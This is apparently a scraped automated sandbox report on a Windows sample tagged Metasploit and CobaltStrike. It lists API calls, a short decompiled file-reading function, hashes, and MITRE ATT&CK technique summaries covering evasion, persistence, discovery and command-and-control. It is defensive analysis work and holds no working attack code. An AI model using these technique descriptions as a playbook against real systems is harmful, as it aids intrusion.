ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 01002F3F
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010030BA
HeapAlloc.KERNEL32(00000008,00000000), ref: 010030DC
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 010030FB
GetEnvironmentVariableA.KERNEL32(?,00000000,00000000), ref: 01003105
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01003123
HeapAlloc.KERNEL32(00000008,00000000), ref: 0100313D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 01003159
SetEnvironmentVariableA.KERNEL32(?,00000000), ref: 01003162
FindCloseChangeNotification.KERNELBASE(?), ref: 0100317A

Memory Dump Source

Source File: 00000006.00000002.404426464.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000006.00000002.404390905.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.404470606.000000000100A000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.404507751.000000000101C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ByteCharMultiWide$HeapRead$AllocEnvironmentPointerVariable$AllocateChangeCloseCreateFindNotification
String ID:
API String ID: 558715291-0
Opcode ID: 5b79eddc37c5b0295cb86ae627c006b2f880e8e2ea263c97f9c033f6325983f5
Instruction ID: 6edba29efb8d6f92a744e2f1cbe749b5a40a38c066eb050d6883b6f690de2842
Opcode Fuzzy Hash: 5b79eddc37c5b0295cb86ae627c006b2f880e8e2ea263c97f9c033f6325983f5
Instruction Fuzzy Hash: C6A172719002189FFF779F29CC44BEAB6B9FF09354F1442A9F599A6192DA318D81CF20

Uniqueness

Uniqueness Score: -1.00%

Function 0100390A, Relevance: 3.0, APIs: 2, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100390A(CHAR* _a4) {
				void* _t2;
				void* _t5;

				_t2 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x8000000, 0); // executed
				_t5 = _t2;
				if(_t5 == 0xffffffff) {
					E010035C6(_t2);
				}
				SetFilePointer(_t5,  *0x100a01c, 0, 0); // executed
				return _t5;
			}

0x01003921
0x01003927
0x0100392c
0x0100392f
0x0100392f
0x0100393f
0x01003948

APIs

CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,08000000,00000000), ref: 01003921
SetFilePointer.KERNELBASE(00000000,00000000,00000000), ref: 0100393F

Part of subcall function 010035C6: GetLastError.KERNEL32 ref: 010035D8
Part of subcall function 010035C6: LoadStringA.USER32 ref: 0100361F
Part of subcall function 010035C6: MessageBoxA.USER32 ref: 0100363B
Part of subcall function 010035C6: DeleteCriticalSection.KERNEL32(0100AD40), ref: 01003659
Part of subcall function 010035C6: ExitProcess.KERNEL32 ref: 01003667

Memory Dump Source

Source File: 00000006.00000002.404426464.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000006.00000002.404390905.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.404470606.000000000100A000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.404507751.000000000101C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateCriticalDeleteErrorExitLastLoadMessagePointerProcessSectionString
String ID:
API String ID: 1911058658-0
Opcode ID: 839749a1e2ebcde92d8a42a34f64b52c1684b9dd7c308e2873248e47bf09a7a9
Instruction ID: 227a9e99d8fa1d26e2d5eac83dd2994c6a3704f78dcbab549cf772295fa79af6
Opcode Fuzzy Hash: 839749a1e2ebcde92d8a42a34f64b52c1684b9dd7c308e2873248e47bf09a7a9
Instruction Fuzzy Hash: A0E01731781320BEF5332728BC0AF897919AB04B75F210210BB94BA1E4C2AA6A409698

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report WhQZ6UbCEY

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Threatname: CobaltStrike

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Privilege Escalation:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre